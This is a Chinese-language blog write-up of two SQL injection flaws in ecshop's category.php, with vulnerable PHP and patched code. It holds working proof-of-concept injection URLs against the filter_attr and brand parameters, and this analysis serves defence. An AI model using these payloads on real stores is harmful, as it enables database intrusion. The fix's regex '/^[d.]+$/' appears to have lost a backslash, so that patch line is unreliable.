zoukankan      html  css  js  c++  java
  • ecshop /category.php SQL Injection Vul

    catalog

    1. 漏洞描述
    2. 漏洞触发条件
    3. 漏洞影响范围
    4. 漏洞代码分析
    5. 防御方法
    6. 攻防思考

    1. 漏洞描述

    Relevant Link:

    http://sebug.net/vuldb/ssvid-19574


    2. 漏洞触发条件

    0x1: POC1

    http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2
    http://localhost/ecshop2.7.2/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=145%20or%201=2  

    0x2: POC2

    http://localhost/ecshop2.7.3/category.php?id=279&brand=173+AND+%28SELECT+1892+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x625454496147%2C%28SELECT+%28CASE+WHEN+%281892%3D1892%29+THEN+1+ELSE+0+END%29%29%2C0x6f4574774f4a%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29&price_min=0&price_max=0&page=2&sort=last_update&order=ASC


    3. 漏洞影响范围
    4. 漏洞代码分析

    0x1: POC1

    /category.php

    ..
    $filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0';
    //变量 $filter_attr_str 是以“.” 分开的数组
    $filter_attr = empty($filter_attr_str) ? '' : explode('.', trim($filter_attr_str));
    ..
     /* 扩展商品查询条件 */
    if (!empty($filter_attr))
    {
        $ext_sql = "SELECT DISTINCT(b.goods_id) FROM " . $ecs->table('goods_attr') . " AS a, " . $ecs->table('goods_attr') . " AS b " .  "WHERE "; 
        $ext_group_goods = array();
    
        foreach ($filter_attr AS $k => $v)                      // 查出符合所有筛选属性条件的商品id */
        {
        if ($v != 0) 
        {
            //$v 没有作任何处理就加入了SQL查询,造成SQL注入
            $sql = $ext_sql . "b.attr_value = a.attr_value AND b.attr_id = " . $cat_filter_attr[$k] ." AND a.goods_attr_id = " . $v;
            ..

    0x2: POC2

    /category.php

    else{
        /* 初始化分页信息 */
        $page = isset($_REQUEST['page'])   && intval($_REQUEST['page'])  > 0 ? intval($_REQUEST['page'])  : 1;
        $size = isset($_CFG['page_size'])  && intval($_CFG['page_size']) > 0 ? intval($_CFG['page_size']) : 10;
        //未对$_REQUEST['brand']参数进行有效过滤
        $brand = isset($_REQUEST['brand']) && intval($_REQUEST['brand']) > 0 ? $_REQUEST['brand'] : 0;
        $price_max = isset($_REQUEST['price_max']) && intval($_REQUEST['price_max']) > 0 ? intval($_REQUEST['price_max']) : 0;
        $price_min = isset($_REQUEST['price_min']) && intval($_REQUEST['price_min']) > 0 ? intval($_REQUEST['price_min']) : 0;
        $filter = (isset($_REQUEST['filter'])) ? intval($_REQUEST['filter']) : 0;
        $filter_attr_str = isset($_REQUEST['filter_attr']) ? htmlspecialchars(trim($_REQUEST['filter_attr'])) : '0';


    5. 防御方法

    0x1: POC1

    /category.php

    ..
    /*对用户输入的$_REQUEST['filter_attr']进行转义  */
    $filter_attr_str = isset($_REQUEST['filter_attr']) ? htmlspecialchars(trim($_REQUEST['filter_attr'])) : '0';
    /* */
    $filter_attr_str = trim(urldecode($filter_attr_str));
    /* 敏感关键字过滤 */
    $filter_attr_str = preg_match('/^[d.]+$/',$filter_attr_str) ? $filter_attr_str : '';
    /**/
    $filter_attr = empty($filter_attr_str) ? '' : explode('.', $filter_attr_str);
    ..
    foreach ($filter_attr AS $k => $v)                      // 查出符合所有筛选属性条件的商品id */
    { 
        /* is_numeric($v) */
        if (is_numeric($v) && $v !=0 )
        { 
        ..

    0x2: POC2

    /category.php

    else{
        /* 初始化分页信息 */
        $page = isset($_REQUEST['page'])   && intval($_REQUEST['page'])  > 0 ? intval($_REQUEST['page'])  : 1;
        $size = isset($_CFG['page_size'])  && intval($_CFG['page_size']) > 0 ? intval($_CFG['page_size']) : 10;
        /* $brand = isset($_REQUEST['brand']) && intval($_REQUEST['brand']) > 0 ? $_REQUEST['brand'] : 0; */
        $brand = isset($_REQUEST['brand']) && intval($_REQUEST['brand']) > 0 ? intval($_REQUEST['brand']) : 0;
        /**/


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved

  • 相关阅读:
    安装Manjaro KDE 18.04
    nltk 词性解析
    Ubuntu安装Hadoop
    Ubuntu安装JDK
    Python3-Cookbook总结
    linux 条件变量
    多线程编程 ------ 互斥量
    线程相关笔记
    realloc ------ 扩大malloc得到的内存空间
    gcc 消除未使用变量的警告
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4524161.html
Copyright © 2011-2022 走看看